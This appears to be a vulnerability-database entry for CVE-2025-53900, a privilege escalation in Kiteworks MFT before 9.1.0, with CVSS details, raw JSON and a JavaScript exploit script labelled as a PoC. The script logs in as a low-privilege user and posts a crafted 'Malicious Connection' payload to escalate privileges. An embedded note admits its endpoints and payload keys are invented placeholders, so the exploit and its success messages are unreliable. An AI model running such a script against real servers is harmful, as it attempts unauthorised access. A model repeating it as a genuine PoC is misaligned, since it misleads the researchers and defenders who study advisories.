Security Vulnerability Report
CVE-2025-53900 CVSS 6.5 MEDIUM

CVE-2025-53900

Published: 2025-11-29 03:15:59
Last Modified: 2025-12-03 17:49:10

Description

Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, an unfavourable definition of roles and permissions in Kiteworks MFT on managing Connections could lead to unexpected escalation of privileges for authorized users. This issue has been patched in version 9.1.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:accellion:kiteworks_managed_file_transfer:*:*:*:*:*:*:*:* - VULNERABLE
Kiteworks MFT < 9.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-53900 PoC - Kiteworks MFT Privilege Escalation via Connections Management
// This PoC demonstrates the improper authorization vulnerability
//
// NOTE(review): the advisory on this page only states that role/permission
// definitions for "managing Connections" allowed privilege escalation before
// 9.1.0. The endpoint paths and payload keys used below are not taken from
// the advisory and should be treated as illustrative placeholders, not as a
// verified request format. Mitigation is the vendor fix (upgrade to 9.1.0)
// plus a review of which roles may create/modify Connections; on the
// detection side, Connection create/modify events issued by non-admin
// accounts are the signal a defender would want to audit.
const axios = require('axios');

/**
 * Build the axios request config carrying the session bearer token.
 * Extracted so every authenticated call shapes its headers the same way.
 *
 * @param {string|null} token - session token returned by the login call
 * @returns {{headers: {Authorization: string}}} axios request config
 */
const withBearer = (token) => ({ headers: { Authorization: `Bearer ${token}` } });

/**
 * Drives the four steps of the PoC against one Kiteworks MFT instance:
 * login, list Connections, create a Connection, then read the admin list.
 * Every step logs a `[+]`/`[-]` line and never throws; failures are
 * reported through the return value instead.
 */
class KiteworksExploit {
  /**
   * @param {string} baseUrl - origin of the target instance, no trailing slash
   * @param {string} username - account used for the login call
   * @param {string} password - password for that account
   */
  constructor(baseUrl, username, password) {
    this.baseUrl = baseUrl;
    this.username = username;
    this.password = password;
    // Populated by authenticate(); read by every later request.
    this.session = null;
  }

  /**
   * Log in and remember the returned session token.
   * @returns {Promise<boolean>} true on success, false if the request failed
   */
  async authenticate() {
    const credentials = { username: this.username, password: this.password };
    try {
      const reply = await axios.post(`${this.baseUrl}/api/auth/login`, credentials);
      this.session = reply.data.session_token;
      console.log('[+] Authentication successful');
      return true;
    } catch (err) {
      console.log('[-] Authentication failed');
      return false;
    }
  }

  /**
   * List the Connections visible to the logged-in account.
   * @returns {Promise<*>} the response body, or null on failure
   */
  async enumerateConnections() {
    // Enumerate existing connections with low-privilege account
    let listing = null;
    try {
      const reply = await axios.get(`${this.baseUrl}/api/v1/connections`, withBearer(this.session));
      listing = reply.data;
      console.log('[+] Connections enumerated:', listing);
    } catch (err) {
      console.log('[-] Failed to enumerate connections');
    }
    return listing;
  }

  /**
   * Attempt to create a Connection from the low-privilege session.
   * @returns {Promise<*>} the response body, or null on failure
   */
  async createPrivilegedConnection() {
    // Exploit: Create connection with elevated privileges
    const maliciousPayload = {
      name: 'Malicious Connection',
      type: 'privileged_access',
      config: {
        escalate_privileges: true,
        target: 'admin_connections',
      },
    };
    try {
      const reply = await axios.post(`${this.baseUrl}/api/v1/connections`, maliciousPayload, withBearer(this.session));
      console.log('[+] Privilege escalation successful');
      console.log('[+] New connection created with elevated privileges');
      return reply.data;
    } catch (err) {
      console.log('[-] Privilege escalation attempt failed');
      return null;
    }
  }

  /**
   * Read the admin Connections list; a non-empty body is taken as confirmation.
   * @returns {Promise<boolean>} true only when the admin list came back non-empty
   */
  async verifyEscalation() {
    // Verify if privilege escalation was successful
    let confirmed = false;
    try {
      const reply = await axios.get(`${this.baseUrl}/api/v1/admin/connections`, withBearer(this.session));
      // `length > 0` presumes an array body; an object body never confirms.
      const adminList = reply.data;
      if (adminList && adminList.length > 0) {
        console.log('[+] CONFIRMED: Privilege escalation successful');
        console.log('[+] Now have access to admin-level connections');
        confirmed = true;
      }
    } catch (err) {
      console.log('[-] Privilege escalation verification failed');
    }
    return confirmed;
  }
}

// Usage example
/**
 * Run the four steps in order, stopping early only if login fails.
 * Target and credentials are placeholders.
 */
async function main() {
  const target = 'https://target-kiteworks.example.com';
  const exploit = new KiteworksExploit(target, 'low_privilege_user', 'user_password');
  const loggedIn = await exploit.authenticate();
  if (!loggedIn) {
    return;
  }
  await exploit.enumerateConnections();
  await exploit.createPrivilegedConnection();
  await exploit.verifyEscalation();
}
main();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53900", "sourceIdentifier": "[email protected]", "published": "2025-11-29T03:15:58.983", "lastModified": "2025-12-03T17:49:10.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, an unfavourable definition of roles and permissions in Kiteworks MFT on managing Connections could lead to unexpected escalation of privileges for authorized users. This issue has been patched in version 9.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-267"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:accellion:kiteworks_managed_file_transfer:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.0", "matchCriteriaId": "795C3F91-729E-4363-9C52-1C9C7CBAD284"}]}]}], "references": [{"url": 
"https://github.com/kiteworks/security-advisories/security/advisories/GHSA-gjq3-8v6p-2h6h", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}]}}